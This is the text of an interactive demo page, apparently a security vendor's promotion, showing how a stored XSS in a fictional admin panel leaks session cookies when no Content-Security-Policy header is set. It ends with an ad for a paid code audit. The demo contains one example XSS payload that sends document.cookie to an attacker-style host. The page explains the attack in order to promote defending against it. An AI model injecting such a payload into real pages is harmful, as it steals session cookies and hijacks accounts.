Interactive Demo

What Happens Without a CSP Header

A missing Content-Security-Policy header turns a small XSS vulnerability into a full session hijack. Watch it happen, then see CSP stop it.

A real-looking SaaS app

You'll see MySaaS, a fictional admin panel with customer names, emails, and payment cards.

An attacker steals everything

A malicious script runs in the browser, hijacks the admin session, and dumps all customer data.

One header stops it cold

Enable a Content-Security-Policy header and watch the exact same attack fail instantly.

Start the Demo
1Inject/2Steal/3Protect

Below is MySaaS, a fictional app with real customer data. It has an XSS vulnerability and no CSP header.

https://mysaas.com/admin/customersVictim
MySaaS
admin

Customer Data

4 active accounts

NameEmailPlanCard
Emma Johnsonemma@stripe.comEnterprise****4242
James Chenjames@linear.appPro****8888
Sofia Martinezsofia@vercel.comEnterprise****1234
Alex Kimalex@shopify.comPro****5678

Internal notes (rendered as HTML)

<script>fetch("https://evil.sh/c="+document.cookie)</script>
attacker@kali:~Attacker

Waiting for victim to trigger exploit...

What is XSS?

Cross-Site Scripting (XSS) happens when an application renders user-supplied content as HTML without escaping it. If an attacker can inject a <script> tag, the browser executes it with full access to the page, including cookies and session tokens.

The vulnerability below

MySaaS has an “Internal notes” field that renders raw HTML. An attacker has placed a script tag that sends the admin's session cookie to an external server. Click the button to see what happens.

Only available with ShipShield ($25)

Go Deeper With a Full Codebase Audit

The free scan checks what's visible from the outside. A full ShipShield audit connects to your GitHub repo and analyzes your actual source code, dependencies, infrastructure, and more, covering 5,000,000+ vulnerability signatures.

Exposed Secrets

API keys, credentials, and tokens buried in code and git history

Auth & Authorization

Missing auth checks, weak JWT config, privilege escalation paths

Injection Vulnerabilities

SQL injection, XSS, SSRF, and command injection in your source code

Dependency CVEs

Known vulnerabilities across npm, pip, cargo, and go packages

AI Business Logic Review

AI-powered analysis of input validation, race conditions, and logic flaws

Sensitive Data Flows

PII logging, unencrypted data transmission, and storage issues

Infrastructure Security

Rate limiting, request size limits, and file upload restrictions

Docker & Container Scanning

Container misconfigs, exposed ports, running as root, OS-level CVEs

License Compliance

GPL/AGPL copyleft detection across all your dependencies

SBOM Generation

SPDX-format Software Bill of Materials for compliance and audits

Supply Chain Security

Typosquatting detection and suspicious package analysis

Professional PDF Report

Detailed findings with severity ratings, code references, and AI-powered fix suggestions

Get a Full Codebase Audit for $25

Scans complete in 2-8 minutes · Automatic refund if scan fails